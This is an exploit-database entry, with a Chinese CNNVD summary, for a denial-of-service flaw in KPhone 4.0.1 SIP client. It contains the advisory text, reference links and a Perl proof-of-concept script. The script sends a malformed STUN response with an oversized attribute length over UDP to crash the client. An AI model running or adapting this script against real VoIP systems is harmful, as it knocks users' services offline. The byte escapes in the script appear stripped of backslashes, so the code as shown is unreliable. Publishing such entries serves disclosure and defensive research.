https://www.exploit-db.com/exploits/24011
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-270

KPhone4.0.1及其以前版本的sipclient.cpp存在漏洞。远程攻击者借助STUN响应包导致服务拒绝（崩溃），这个STUN响应包具有超大attrLen值导致out-of-bounds读取。

source: http://www.securityfocus.com/bid/10159/info

A denial of service vulnerability has been reported in KPhone. This issue may be triggered by a malformed SIP (Session Initiation Protocol) STUN message. This is due to insufficient validation of user-specified STUN packet attribute lengths, causing an out of bounds read and subsequent crash.

It is not known if this condition could be further exploited to execute arbitrary code, though it has been conjectured that it is not exploitable.

#!/usr/bin/perl
 

use IO::Socket::INET;

my $buf = join("", "x01x01", # BindingResponse
    "x00x01", # MsgLength
    "A"x16, # GUID
    "x00x00", # Attribute
    "x08x01", # AttrLength
    "A"x7975 # Value
   );

my $remote = IO::Socket::INET->new( Proto => 'udp',
         PeerAddr => '192.168.1.49',
         PeerPort => 5060);

print $remote $buf;

来源:www.wirlab.net
链接:http://www.wirlab.net/kphone/changes-4.0.2.html
来源:BID
名称:10159
链接:http://www.securityfocus.com/bid/10159
来源:XF
名称:kphone-stun-dos(15874)
链接:http://xforce.iss.net/xforce/xfdb/15874
来源:www.securiteam.com
链接:http://www.securiteam.com/unixfocus/5PP0B1FCLY.html
来源:BUGTRAQ
名称:20040419KPhoneSTUNDoS(MalformedSTUNPackets)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108244325924859&w;=2